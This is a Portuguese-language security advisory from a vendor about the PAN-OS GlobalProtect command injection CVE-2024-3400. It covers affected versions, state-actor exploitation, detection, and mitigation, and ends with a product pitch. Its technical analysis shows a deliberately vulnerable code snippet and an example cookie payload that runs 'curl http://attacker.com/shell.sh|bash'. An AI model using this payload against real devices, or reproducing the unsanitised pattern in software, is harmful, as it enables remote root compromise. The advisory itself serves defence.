CVE-2024-3400: Injeção de comando Palo Alto PAN-OS - CVSS 10.0
CVE-2024-3400 é uma vulnerabilidade de injeção de comando de sistema operacional de gravidade máxima no gateway PAN-OS GlobalProtect da Palo Alto Networks. Um invasor não autenticado pode executar comandos arbitrários do sistema operacional como root, sem necessidade de interação. Explorado por UTA0218 (provavelmente patrocinado pelo estado) antes da divulgação.
| Atributo | Valor |
|---|---|
| ID do CVE | CVE-2024-3400 |
| Vetor CVSS | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-77: Injeção de comando do sistema operacional |
| Publicado | 12 de abril de 2024 |
| Exploração | Ativo — CISA KEV, exploração por ator estatal |
O que é CVE-2024-3400?
CVE-2024-3400 afeta o recurso GlobalProtect do Palo Alto Networks PAN-OS. Quando o GlobalProtect é configurado como um gateway ou portal, um invasor remoto não autenticado pode injetar comandos arbitrários do sistema operacional que são executados com privilégios de root no dispositivo de firewall.
A combinação de fatores — sem necessidade de autenticação, acesso à rede, escopo alterado, impacto máximo na confidencialidade, integridade e disponibilidade — produz uma pontuação CVSS 10.0 perfeita. Entre os fornecedores de firewall, apenas algumas vulnerabilidades receberam essa pontuação.
🚨 Exploração do Estado-nação antes da disponibilidade do patch
A Volexity descobriu essa vulnerabilidade ao responder a um incidente em que UTA0218, um sofisticado agente de ameaças, implantou um novo backdoor Python chamado UPSTYLE em dispositivos PAN-OS comprometidos. O invasor usou o firewall como ponto central para acessar redes internas, roubar credenciais do Active Directory e exfiltrar dados confidenciais. A Volexity estima que a exploração começou no final de março de 2024 – semanas antes de Palo Alto ser notificado.
Sistemas afetados
| Versão PAN-OS | Afetado (GlobalProtect ativado) | Versão Fixa |
|---|---|---|
| PAN-OS 11.1 | <11.1.2-h3 | 11.1.2-h3+ |
| PAN-OS 11.0 | < 11.0.4-h1 | 11.0.4-h1+ |
| PAN-OS 10.2 | < 10.2.9-h1 | 10.2.9-h1+ |
| PAN-OS 10.1 | < 10.1.14-h4 | 10.1.14-h4+ |
Pré-requisito: O gateway ou portal GlobalProtect deve ser configurado (show global-protect-gateway current-user retorna resultados). As organizações que não configuraram o GlobalProtect não serão afetadas.
Análise Técnica
O ponto de injeção está no código de manipulação de sessão do GlobalProtect. Quando uma sessão do GlobalProtect é estabelecida, determinados atributos da sessão são gravados em arquivos temporários no firewall. O código que constrói o caminho do arquivo para esses arquivos de sessão não sanitiza adequadamente o identificador de sessão, que é parcialmente controlado pelo invasor.
# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"] # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}") # Command injection here
# Attacker crafts session ID containing shell metacharacters:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"
O backdoor UPSTYLE instalado por UTA0218 usou um novo mecanismo de persistência: um script Python que monitorou logs de acesso ao servidor web para padrões de solicitação específicos (contendo um comando criptografado), executou os comandos e, em seguida, restaurou o conteúdo do arquivo original para remover evidências da atividade.
Atividade Pós-Exploração (UTA0218)
A Volexity documentou a seguinte sequência pós-exploração de atores do Estado-nação:
- Implantação UPSTYLE: Backdoor Python instalado no caminho do servidor web do firewall para acesso persistente
- Extração de credenciais: Despejo de configuração do firewall contendo credenciais de VPN e informações de roteamento interno
- Movimentação lateral interna: Usando a posição de rede confiável do firewall comprometido para alcançar hosts internos
- Consultas LDAP: Enumeração do Active Directory através do acesso à rede interna do firewall
- Preparação de dados: Compactação e exfiltração de arquivos confidenciais através do firewall
Detecção
Análise de log PAN-OS
# Check for UPSTYLE backdoor artifacts find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null # Suspicious traffic in GlobalProtect logs grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log # Modified system files (UPSTYLE modifies then restores) # Check for recent access times on web server files find /var/appweb -atime -7 -name "*.php" -o -name "*.py"
Consultas de caça a ameaças
- Respostas HTTP 200 para caminhos GlobalProtect com formatos de cookie de sessão incomuns
- Conexões de saída do plano de gerenciamento de firewall para IPs externos
- Consultas DNS do PAN-OS para domínios que não estão no feed de inteligência de ameaças
- Carimbos de data e hora incomuns de modificação de arquivo em arquivos de configuração de firewall
Mitigação
- Corrija imediatamente: Aplique as versões de hotfix listadas acima. Este é um CVSS 10.0 com exploração ativa – não há atraso aceitável.
- Solução provisória para prevenção de ameaças: Para dispositivos sem patch, ative a Prevenção contra ameaças com perfis de segurança nas interfaces GlobalProtect. Palo Alto forneceu assinaturas específicas de identificação de ameaças.
- Desative o GlobalProtect se não for necessário: As organizações que não usam ativamente o GlobalProtect podem desativar temporariamente o recurso como solução alternativa.
- Audite os arquivos de firewall: Execute o script fornecido por Palo Alto para verificar UPSTYLE e outros artefatos pós-exploração.
- Rotacione todas as credenciais: Quaisquer credenciais armazenadas na configuração do firewall (certificados VPN, credenciais de ligação LDAP, etc.) devem ser consideradas comprometidas.
💡 Diretriz de Emergência CISA: CISA emitiu a Diretiva de Emergência 24-03 exigindo que todas as agências federais dos EUA apliquem patches ou mitigações até 19 de abril de 2024. A urgência reflete a gravidade e a exploração ativa por parte de atores de ameaças sofisticados.
Capacidade de detecção KENSAI
- Impressão digital PAN-OS: KENSAI identifica dispositivos Palo Alto voltados para a Internet e suas versões PAN-OS, sinalizando configurações vulneráveis do CVE-2024-3400
- Detecção de exposição GlobalProtect: Identifica se o gateway/portal GlobalProtect está habilitado nos dispositivos detectados
- Confirmação de exploração segura: A investigação não destrutiva verifica a capacidade de exploração sem executar comandos
- Verificação do indicador de comprometimento: Verifica indicadores de backdoor UPSTYLE em caminhos da web acessíveis
- Monitoramento contínuo da superfície de ataque: Alertas sobre dispositivos PAN-OS recém-descobertos ingressando na sua superfície de ataque externa
Sua infraestrutura em Palo Alto está exposta a CVE-2024-3400?
KENSAI identifica instantaneamente dispositivos PAN-OS voltados para a Internet vulneráveis à injeção de comando. Não espere que os agentes da ameaça os encontrem primeiro.
Faça uma varredura do seu perímetro agora →